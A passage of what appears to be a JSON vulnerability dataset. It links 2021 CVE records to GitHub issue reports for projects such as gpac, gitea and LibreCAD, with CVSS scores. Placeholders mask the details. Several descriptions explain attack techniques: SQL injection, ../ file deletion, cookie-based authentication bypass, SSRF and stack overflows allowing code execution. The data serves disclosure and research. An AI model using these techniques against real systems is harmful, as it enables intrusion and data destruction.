        "description": "Assertion APITAG (obj_p)' failed at ecma APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case javascript \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45014",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/11",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/11",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-12-11T13:20:17Z",
        "description": "There is SQL blind injection at APITAG article\". APITAG location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id FILETAG APITAG in to the background as the default account admin. FILETAG FILETAG APITAG can see action=cms&ctrl=update&id NUMBERTAG this id is the id in the update method in the FILETAG file FILETAG FILETAG FILETAG APITAG using the APITAG tool FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45015",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/12",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/12",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-12-11T13:39:25Z",
        "description": "exist is an arbitrary file delete vulnerability. APITAG location of the vulnerability is in PATHTAG from line NUMBERTAG to line NUMBERTAG and line NUMBERTAG to determine whether the incoming folder is empty. Delete the empty folder. If it is not empty, it will not be deleted, but the incoming folder will not be deleted. File filtering.. And / although it is not possible to delete non empty folders, but you can delete any file FILETAG APITAG a new file on disk d to delete it FILETAG APITAG the background to find the file management function and find a file to delete FILETAG FILETAG FILETAG in the D drive directory and successfully deleted, it proves that you can indeed use ../ to jump to the directory to operate any file, but you need to pay attention to the folder can only delete empty folders FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45017",
        "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/8",
        "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/8",
        "Repo_new": "xwlrbh/catfish",
        "Issue_Created_At": "2021-12-12T03:23:30Z",
        "description": "There is a csrf vulnerability in catfish APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45018",
        "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/9",
        "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/9",
        "Repo_new": "xwlrbh/catfish",
        "Issue_Created_At": "2021-12-12T03:28:22Z",
        "description": "There is a stored xss vulnerability exists in catfish APITAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45092",
        "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/2",
        "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/2",
        "Repo_new": "cybelesoft/virtualui",
        "Issue_Created_At": "2021-12-13T17:17:14Z",
        "description": "Vulnerability Improper Access Control. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a functionality in Thinfinity APITAG that could allow to a malicious actor to perform social engineering attacks such as phishing via the directory FILETAG reachable by default. How it works By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed). The impact is a good phishing. Payload The vulnerable vector is \" FILETAG \" where \"vpath=//\" is the pointer to the external site to be iframed. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45100",
        "Issue_Url_old": "https://github.com/cifsd-team/ksmbd/issues/550",
        "Issue_Url_new": "https://github.com/cifsd-team/ksmbd/issues/550",
        "Repo_new": "cifsd-team/ksmbd",
        "Issue_Created_At": "2021-12-15T01:44:51Z",
        "description": "Plaintext connection despite encryption enabled. Hello. I am facing an error with the latest stable NUMBERTAG ersion, running on an APITAG machine. My configuration file is as follows: CODETAG Despite \"smb3 encryption\" set to yes, communications are still being made in plain text according to Wireshark. During the initial negotiation, both the client (a Windows NUMBERTAG machine running NUMBERTAG H1, compilation APITAG and the server agree on using NUMBERTAG and AES NUMBERTAG GCM: FILETAG On the the session setup request, however, the client decides to no longer flag it supports encryption, and thus request a plain text connection for unknown reasons: FILETAG Worse is, ksmbd agrees and goes on, ignoring the request to enforce encryption and just sending data on plain. The following screenshot displays a plain text ASCII message from opening a file which shouldn't be visible: FILETAG I am not sure if being made in plain text is an error on the Windows side or not, but at the very least ksmbd should probably deny connections if the user requested encryption in the settings. Attached here is a .zip file with a Wireshark log of the entire packet exchange, from the initial connection to the desconnection: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45258",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1970",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1970",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T15:36:08Z",
        "description": "Stack Overflow in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45259",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1986",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1986",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-14T02:57:15Z",
        "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45260",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1979",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1979",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-11T09:14:24Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45262",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1980",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1980",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-11T09:14:52Z",
        "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45263",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1975",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1975",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-11T01:07:09Z",
        "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45266",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1985",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1985",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-14T02:40:51Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG APITAG APITAG ERRORTAG gdb APITAG APITAG APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45267",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1965",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1965",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T10:59:40Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45288",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1956",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1956",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T07:28:18Z",
        "description": "Double Free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ` Program received signal SIGABRT, Aborted. [ registers ] RA NUMBERTAG RB NUMBERTAG ffff NUMBERTAG ffff NUMBERTAG RC NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG RD NUMBERTAG RSI NUMBERTAG fffffff6fd NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG fffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG RSP NUMBERTAG fffffff6fd NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff6fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff7ffb NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG d NUMBERTAG f APITAG : mov edi NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : mov ea NUMBERTAG e NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG d NUMBERTAG b APITAG : mov rax,QWORD PTR [rsp NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : xor rax,QWORD PTR fs NUMBERTAG ffff NUMBERTAG d NUMBERTAG c APITAG : jne NUMBERTAG ffff NUMBERTAG d NUMBERTAG c4 APITAG NUMBERTAG ffff NUMBERTAG d NUMBERTAG e APITAG : mov eax,r8d NUMBERTAG ffff NUMBERTAG d NUMBERTAG a1 APITAG : add rsp NUMBERTAG stack NUMBERTAG fffffff6fd NUMBERTAG fffffff6fd NUMBERTAG fffffff6fe NUMBERTAG ffff6b0ffca APITAG mov rax,QWORD PTR [rsp NUMBERTAG fffffff6fe NUMBERTAG fffffff6ff NUMBERTAG fffffff6ff NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG b3ee in __libc_message APITAG fmt=fmt APITAG \"%s \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in malloc_printerr (str=str APITAG APITAG double free detected in tcache NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ed in _int_free (a NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG , p NUMBERTAG have_lock NUMBERTAG at APITAG NUMBERTAG ffff6bf NUMBERTAG f5 in gf_odf_del_default () from PATHTAG NUMBERTAG ffff6f NUMBERTAG in gf_sm_load_run_isom () from PATHTAG NUMBERTAG c3a NUMBERTAG in dump_isom_scene (file=<optimized out>, APITAG APITAG PATHTAG is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at APITAG NUMBERTAG edd0 in APITAG (argc=<optimized out>, argv=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b3 in __libc_start_main (main NUMBERTAG d NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d5be in _start () at APITAG gdb peda$ '''",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45289",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1972",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1972",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T16:55:48Z",
        "description": "Program terminated with signal SIGKILL . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG GDB Information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45290",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4383",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4383",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-10T22:07:52Z",
        "description": "An assertion abort in wasm::handle_unreachable(char const , char const , unsigned int) () . Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45291",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1955",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1955",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T06:46:26Z",
        "description": "A segmentation fault in APITAG at APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45292",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1958",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1958",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T08:22:50Z",
        "description": "A segmentation fault in gf_isom_hint_rtp_read () , APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG GDB information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45293",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4384",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4384",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2021-12-10T22:22:07Z",
        "description": "Invalid memory address dereference in APITAG ). Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45297",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1973",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1973",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T19:07:05Z",
        "description": "infinite loop in gf_get_bit_size\uff08\uff09. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! APITAG ] I looked for a similar issue and couldn't find any. [ Yes] I tried with the latest version of GPAC. Installers available at URLTAG [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Version: ERRORTAG System information Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG command: APITAG Result APITAG GDB information CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45325",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4973",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4973",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-09-21T19:40:56Z",
        "description": "server side request forgery (SSRF) vulnerability in APITAG sign in. Another SSRF issue ( the others reported on Gogs repository ). Affected URL: APITAG Payload as APITAG URI: APITAG Response: APITAG It's less severe than the one in the webhooks because in the case of a web server it doesn't show the full HTTP response body and headers, just that the APITAG isn't found. It still shows servers signatures for non HTTP servers, for example for SSH, showed above. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45328",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4332",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4332",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-06-28T14:02:25Z",
        "description": "Open Redirect vulnerability. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: not relevent Description As said in NUMBERTAG PR NUMBERTAG doesn't mitigate the issue because there are still Open Redirect issues in other parts of Gitea, thus is possible to redirect the login to an internal link where the issue is not mitigated. See the following url: FILETAG or shorter: FILETAG Screenshots None APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45330",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4336",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4336",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-06-28T15:28:30Z",
        "description": "Log out only deletes cookies. APITAG Gitea version (or commit ref): any Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [ ] No [x] Not relevant Log gist: Description If user log outs the session / cookies don't expire, allowing an attacker to be still logged in. In fact Gitea log out users by deleting cookies on client side, but they are still valid server side. Getting the cookies requires a MITM attack, so it isn't so easy to exploit. Issue already reported on mail two months ago but never got an answer. Screenshots None APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45340",
        "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/51",
        "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/51",
        "Repo_new": "libsixel/libsixel",
        "Issue_Created_At": "2021-12-14T22:08:42Z",
        "description": "NULL pointer dereference in stb_image.h. This is a duplicate report of issue NUMBERTAG URLTAG in the original project. I'm not sure where best to report this, but it affects both projects. Vulnerable versions saitoha/libsixel at the latest APITAG commit libsixel/libsixel at the latest APITAG commit Steps to reproduce APITAG Input file (a malformed PICT format image) is FILETAG Cause Segmentation fault in APITAG at APITAG : CODETAG The src pointer is NULL , as passed in from APITAG . The source of the NULL pointer is the malloc at line APITAG : APITAG whose output is never checked for NULL . The x and y dimensions NUMBERTAG are read directly from the input file, and they pass the check in APITAG which only checks for integer overflow. The total size of the allocated buffer is APITAG and allocation fails. Impact Denial of service is the only obvious impact. Mitigation APITAG starting at version NUMBERTAG commit APITAG include a check for this condition. libsixel should be brought up to date with this version if possible. If not, backport the check URLTAG as well as similar error checks for other malloc calls.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45341",
        "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1462",
        "Issue_Url_new": "https://github.com/librecad/librecad/issues/1462",
        "Repo_new": "librecad/librecad",
        "Issue_Created_At": "2021-12-18T19:01:27Z",
        "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3. Vulnerable Products APITAG NUMBERTAG rc3 and older Jw_cad NUMBERTAG a and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG rc3 in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the attached FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization at APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG Some varieties of APITAG provide their own size, e.g. APITAG on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load the file if it would overflow buf NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45342",
        "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1464",
        "Issue_Url_new": "https://github.com/librecad/librecad/issues/1464",
        "Repo_new": "librecad/librecad",
        "Issue_Created_At": "2021-12-18T22:48:34Z",
        "description": "Remote Code Execution vulnerability in APITAG NUMBERTAG rc3 (JWW APITAG Vulnerable Products APITAG NUMBERTAG rc3 and older Steps to reproduce or sample file NUMBERTAG Start APITAG NUMBERTAG in a debugger NUMBERTAG APITAG NUMBERTAG Unzip and open the FILETAG NUMBERTAG Observe APITAG crash, with APITAG (AAAA) Screenshot: FILETAG Cause The APITAG entity deserialization in APITAG is vulnerable to a stack buffer overflow. APITAG declared in APITAG on line NUMBERTAG URLTAG is of fixed size NUMBERTAG One variety of APITAG provides its own size field, as seen on line NUMBERTAG URLTAG and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address. The attached APITAG file is tuned to trigger this behavior in the latest windows release of APITAG but the same bug is also present in older versions and on other platforms. Note : This is similar to, but distinct from issue NUMBERTAG Impact An attacker can craft a JW CAD input file and thereby gain control over execution flow (EIP controlled directly). This allows an attacker to run arbitrary code on the system running APITAG with the privileges of the current user. Proposed Mitigation NUMBERTAG Perform bounds checking in APITAG , and refuse to load more data to buf than actually supported NUMBERTAG Enable stack smashing protection in the windows build of APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45343",
        "Issue_Url_old": "https://github.com/LibreCAD/LibreCAD/issues/1468",
        "Issue_Url_new": "https://github.com/librecad/librecad/issues/1468",
        "Repo_new": "librecad/librecad",
        "Issue_Created_At": "2021-12-19T17:00:48Z",
        "description": "NULL pointer dereference in DXF parser, HATCH code NUMBERTAG Steps to reproduce or sample file NUMBERTAG Unzip and load the FILETAG in APITAG NUMBERTAG rc3 Cause The APITAG APITAG is written to when loading a HATCH entity with code NUMBERTAG If this occurs before a code NUMBERTAG the pointer is still NULL , leading to a crash. Impact Denial of service. Proposed Mitigation Ensure that APITAG is not NULL before dereferencing at APITAG Operating System and APITAG version info Version NUMBERTAG rc3 Compiler: GNU GCC NUMBERTAG Compiled on: No NUMBERTAG Qt Version NUMBERTAG Boost Version NUMBERTAG System: Windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45347",
        "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/2",
        "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/2",
        "Repo_new": "forget-code/zzcms",
        "Issue_Created_At": "2021-12-15T03:07:23Z",
        "description": "Authentication can be bypassed by changing the user name in the cookie to use any password. If the user name in the cookie is changed to an existing user, any password can be used to bypass authentication FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45364",
        "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/2",
        "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/2",
        "Repo_new": "y4tacker/web-security",
        "Issue_Created_At": "2021-12-16T11:50:04Z",
